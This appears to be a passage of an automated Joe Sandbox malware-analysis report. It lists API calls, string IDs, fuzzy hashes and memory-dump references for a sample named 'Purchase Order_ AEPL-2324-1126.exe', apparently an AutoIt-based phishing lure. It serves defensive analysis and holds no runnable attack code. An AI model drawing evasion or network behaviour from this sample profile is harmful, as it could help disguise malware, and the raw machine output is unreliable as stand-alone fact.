                                  • Opcode Fuzzy Hash: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                  • Instruction Fuzzy Hash: 46418E71A002099FDB04CF98D880AEEB7B5FF59300F14816EED04AB341DB756952CFA5
                                  APIs
                                  • _strlen.LIBCMT ref: 0040F858
                                    • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
                                    • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
                                  • _sprintf.LIBCMT ref: 0040F9AE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: _memmove$_sprintf_strlen
                                  • String ID: %02X
                                  • API String ID: 1921645428-436463671
                                  • Opcode ID: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                  • Instruction ID: e5a937a20bc973e7022889ba35624413ac66f4a4f80aeb0e2d5e31f1d02bff57
                                  • Opcode Fuzzy Hash: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                  • Instruction Fuzzy Hash: 3E21287270021436D724B66E8C82FDAB39CAF55744F50007FF501A76C1EABCBA1983AD
                                  APIs
                                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: MessageSend
                                  • String ID: Combobox
                                  • API String ID: 3850602802-2096851135
                                  • Opcode ID: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                  • Instruction ID: 528d1b292af097fd122ed4be4541c74d7578eb88e117dd2fe935d7ad7cd5862b
                                  • Opcode Fuzzy Hash: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                  • Instruction Fuzzy Hash: 0A21A5716102096BEB10DE68DC85FDB3398EB59734F20431AFA24A72D1D3B9EC958768
                                  APIs
                                  • GetWindowTextLengthW.USER32(00000000), ref: 0045134A
                                  • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: LengthMessageSendTextWindow
                                  • String ID: edit
                                  • API String ID: 2978978980-2167791130
                                  APIs
                                  • Sleep.KERNEL32(00000000), ref: 00476CB0
                                  • GlobalMemoryStatusEx.KERNEL32 ref: 00476CC3
                                  Strings
                                  Similarity
                                  • API ID: GlobalMemorySleepStatus
                                  • String ID: @
                                  • API String ID: 2783356886-2766056989
                                  APIs
                                  Strings
                                  Similarity
                                  • API ID: htonsinet_addr
                                  • String ID: 255.255.255.255
                                  • API String ID: 3832099526-2422070025
                                  APIs
                                  • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
                                  Strings
                                  Similarity
                                  • API ID: InternetOpen
                                  • String ID: <local>
                                  • API String ID: 2038078732-4266983199
                                  APIs
                                  Strings
                                  Similarity
                                  • API ID: __fread_nolock_memmove
                                  • String ID: EA06
                                  • API String ID: 1988441806-3962188686
                                  APIs
                                  Strings
                                  Similarity
                                  • API ID: _memmove
                                  • String ID: u,D
                                  • API String ID: 4104443479-3858472334
                                  APIs
                                  • _wcslen.LIBCMT ref: 00401B11
                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                  • _memmove.LIBCMT ref: 00401B57
                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                    • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                  Strings
                                  Similarity
                                  • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                                  • String ID: @EXITCODE
                                  • API String ID: 2734553683-3436989551
                                  APIs
                                  • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560FE
                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                  • wsprintfW.USER32 ref: 0045612A
                                  Strings
                                  Similarity
                                  • API ID: MessageSend_mallocwsprintf
                                  • String ID: %d/%02d/%02d
                                  • API String ID: 1262938277-328681919
                                  APIs
                                  • InternetCloseHandle.WININET(?), ref: 00442663
                                  • InternetCloseHandle.WININET ref: 00442668
                                    • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
                                  Strings
                                  Similarity
                                  • API ID: CloseHandleInternet$ObjectSingleWait
                                  • String ID: aeB
                                  • API String ID: 857135153-906807131
                                  APIs
                                  Strings
                                  • C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe, xrefs: 0043324B
                                  • ^B, xrefs: 00433248
                                  Similarity
                                  • API ID: _wcsncpy
                                  • String ID: ^B$C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe
                                  • API String ID: 1735881322-3425415338
                                  APIs
                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441BFE
                                  • PostMessageW.USER32(00000000), ref: 00441C05
                                    • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                  Strings
                                  Similarity
                                  • API ID: FindMessagePostSleepWindow
                                  • String ID: Shell_TrayWnd
                                  • API String ID: 529655941-2988720461
                                  APIs
                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
                                  • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D
                                    • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                  Strings
                                  Similarity
                                  • API ID: FindMessagePostSleepWindow
                                  • String ID: Shell_TrayWnd
                                  • API String ID: 529655941-2988720461
                                  APIs
                                  • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
                                    • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
                                  Strings
                                  Similarity
                                  • API ID: Message_doexit
                                  • String ID: AutoIt$Error allocating memory.
                                  • API String ID: 1993061046-4017498283